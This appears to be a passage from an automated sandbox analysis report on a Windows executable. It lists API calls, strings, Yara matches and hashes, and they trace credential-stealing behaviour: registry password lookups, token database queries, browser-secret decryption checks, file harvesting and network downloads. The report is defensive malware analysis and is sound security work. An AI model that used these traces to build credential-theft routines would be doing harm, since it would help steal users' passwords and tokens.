                                      • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                      • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                    • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                    • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                    • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                    • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                    • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                    • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                    • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                    • task.LIBCPMTD ref: 004076FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: :
                                    • API String ID: 3191641157-3653984579
                                    • Opcode ID: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                    • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                    • Opcode Fuzzy Hash: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                    • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                    Function 007F1612 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(?,?), ref: 007F1642
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                      • Part of subcall function 007F94C7: StrStrA.SHLWAPI(?,?), ref: 007F94D3
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F167E
                                      • Part of subcall function 007F94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 007F94F7
                                      • Part of subcall function 007F94C7: lstrlen.KERNEL32(?), ref: 007F950E
                                      • Part of subcall function 007F94C7: wsprintfA.USER32 ref: 007F952E
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F16C6
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F170E
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F1755
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F179D
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F17E5
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F182C
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F1874
                                      • Part of subcall function 007FAA87: lstrlen.KERNEL32(007E516C,?,?,007E516C,00420DDE), ref: 007FAA92
                                      • Part of subcall function 007FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 007FAAEC
                                    • strtok_s.MSVCRT ref: 007F19B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                    • String ID:
                                    • API String ID: 4276352425-0
                                    • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                    • Instruction ID: 1a1085de41a4f774d475dca9592622b0fd3840361c9343f06800c106cb98a936
                                    • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                    • Instruction Fuzzy Hash: FD7143B695011DEBCB54EBA0DC9DEFE7379AF64300F044598B20DA2241EE799B88CF51
                                    Function 004072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00407314
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                    • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                      • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                    • task.LIBCPMTD ref: 00407555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                    • String ID: Password
                                    • API String ID: 2698061284-3434357891
                                    • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                    • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                    • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                    • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                    Function 00414780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcatA.KERNEL32(?,00A19220,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                    • lstrcatA.KERNEL32(?,?), ref: 00414820
                                    • lstrcatA.KERNEL32(?,?), ref: 00414834
                                    • lstrcatA.KERNEL32(?,00A14BF8), ref: 00414847
                                    • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                    • lstrcatA.KERNEL32(?,00A19E00), ref: 0041486F
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                      • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                      • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                      • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                      • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID: 0aA
                                    • API String ID: 167551676-2786531170
                                    • Opcode ID: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                    • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                    • Opcode Fuzzy Hash: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                    • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                    Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00A19418,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00A19418,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                    • __aulldiv.LIBCMT ref: 00418172
                                    • __aulldiv.LIBCMT ref: 00418180
                                    • wsprintfA.USER32 ref: 004181AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2886426298-3474575989
                                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                    • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                    • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                    Function 007E6307 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A51
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A68
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A7F
                                      • Part of subcall function 007E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AA0
                                      • Part of subcall function 007E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
                                    • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 007E6376
                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 007E63AE
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 007E63F6
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007E641A
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 007E6443
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007E6471
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 007E64B0
                                    • InternetCloseHandle.WININET(?), ref: 007E64BA
                                    • InternetCloseHandle.WININET(00000000), ref: 007E64C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 4287319946-0
                                    • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                    • Instruction ID: 1bf0b469ea516813270a3cfa741f205244df7c0c52a326d4adecf3565d2ea7b2
                                    • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                    • Instruction Fuzzy Hash: 1A5162B5A40258EBDB20DF91CC49BEE7779EB58701F108098F605A72C0DB786B89CF95
                                    Function 007F4FD7 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 007F4FEE
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F5017
                                    • lstrcat.KERNEL32(?,00421000), ref: 007F5034
                                      • Part of subcall function 007F4B77: wsprintfA.USER32 ref: 007F4B93
                                      • Part of subcall function 007F4B77: FindFirstFileA.KERNEL32(?,?), ref: 007F4BAA
                                    • memset.MSVCRT ref: 007F507A
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F50A3
                                    • lstrcat.KERNEL32(?,00421020), ref: 007F50C0
                                      • Part of subcall function 007F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 007F4BD8
                                      • Part of subcall function 007F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 007F4BEE
                                      • Part of subcall function 007F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DE4
                                      • Part of subcall function 007F4B77: FindClose.KERNEL32(000000FF), ref: 007F4DF9
                                    • memset.MSVCRT ref: 007F5106
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F512F
                                    • lstrcat.KERNEL32(?,00421038), ref: 007F514C
                                      • Part of subcall function 007F4B77: wsprintfA.USER32 ref: 007F4C17
                                      • Part of subcall function 007F4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 007F4C2C
                                      • Part of subcall function 007F4B77: wsprintfA.USER32 ref: 007F4C49
                                      • Part of subcall function 007F4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 007F4C85
                                      • Part of subcall function 007F4B77: lstrcat.KERNEL32(?,0064A524), ref: 007F4CB1
                                      • Part of subcall function 007F4B77: lstrcat.KERNEL32(?,00420FF8), ref: 007F4CC3
                                      • Part of subcall function 007F4B77: lstrcat.KERNEL32(?,?), ref: 007F4CD7
                                      • Part of subcall function 007F4B77: lstrcat.KERNEL32(?,00420FFC), ref: 007F4CE9
                                      • Part of subcall function 007F4B77: lstrcat.KERNEL32(?,?), ref: 007F4CFD
                                      • Part of subcall function 007F4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 007F4D13
                                      • Part of subcall function 007F4B77: DeleteFileA.KERNEL32(?), ref: 007F4D98
                                    • memset.MSVCRT ref: 007F5192
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID:
                                    • API String ID: 4017274736-0
                                    • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                    • Instruction ID: 887b4a8fb6aabcf7ebcc726c75a41452b416ab7b75ff69b6a76f06a2794879b6
                                    • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                    • Instruction Fuzzy Hash: 764188B9A40318B7D714F7B0EC4BFED7738AB24701F804454B689661C1EEB997D88B92
                                    Function 007F8367 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 007F8397
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F839E
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007F83BF
                                    • __aulldiv.LIBCMT ref: 007F83D9
                                    • __aulldiv.LIBCMT ref: 007F83E7
                                    • wsprintfA.USER32 ref: 007F8413
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: @
                                    • API String ID: 2774356765-2766056989
                                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                    • Instruction ID: 92991d14b4a0c95ac75e2d4afaa4f9fc0b2d53ea93097ade083f16c09610f2e7
                                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                    • Instruction Fuzzy Hash: 842127B1A44218ABDB10DFD5CC4AFBEBBB9FB44B14F104609F615AB280C7786900CBA5
                                    Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                    • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 1440504306-1079375795
                                    • Opcode ID: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                    • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                    • Opcode Fuzzy Hash: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                    • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                    Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: B
                                    • API String ID: 1494266314-2248957098
                                    • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                    • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                    • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                    • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                    Function 00409E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                    • memset.MSVCRT ref: 00409EE8
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 1977917189-1096346117
                                    • Opcode ID: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                    • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                    • Opcode Fuzzy Hash: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                    • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                    Function 007E7837 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007E7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007E75A1
                                      • Part of subcall function 007E7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007E7618
                                      • Part of subcall function 007E7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 007E7674
                                      • Part of subcall function 007E7537: GetProcessHeap.KERNEL32(00000000,?), ref: 007E76B9
                                      • Part of subcall function 007E7537: HeapFree.KERNEL32(00000000), ref: 007E76C0
                                    • lstrcat.KERNEL32(0064A668,004217FC), ref: 007E786D
                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 007E78AF
                                    • lstrcat.KERNEL32(0064A668,00421800), ref: 007E78C1
                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 007E78F6
                                    • lstrcat.KERNEL32(0064A668,00421804), ref: 007E7907
                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 007E793A
                                    • lstrcat.KERNEL32(0064A668,00421808), ref: 007E7954
                                    • task.LIBCPMTD ref: 007E7962
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID:
                                    • API String ID: 2677904052-0
                                    • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                    • Instruction ID: bc6df98e102588396b2738070035e13f124b4814623991c261b2a41db0834991
                                    • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                    • Instruction Fuzzy Hash: 01315E79A41149EFDB08FBE0DC99DFE777AEB59301B105018E106A7291DA38A942CB62
                                    Function 007E5217 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007E5231
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007E5238
                                    • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 007E5251
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 007E5278
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 007E52A8
                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 007E52F1
                                    • InternetCloseHandle.WININET(?), ref: 007E5320
                                    • InternetCloseHandle.WININET(?), ref: 007E532D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                    • String ID:
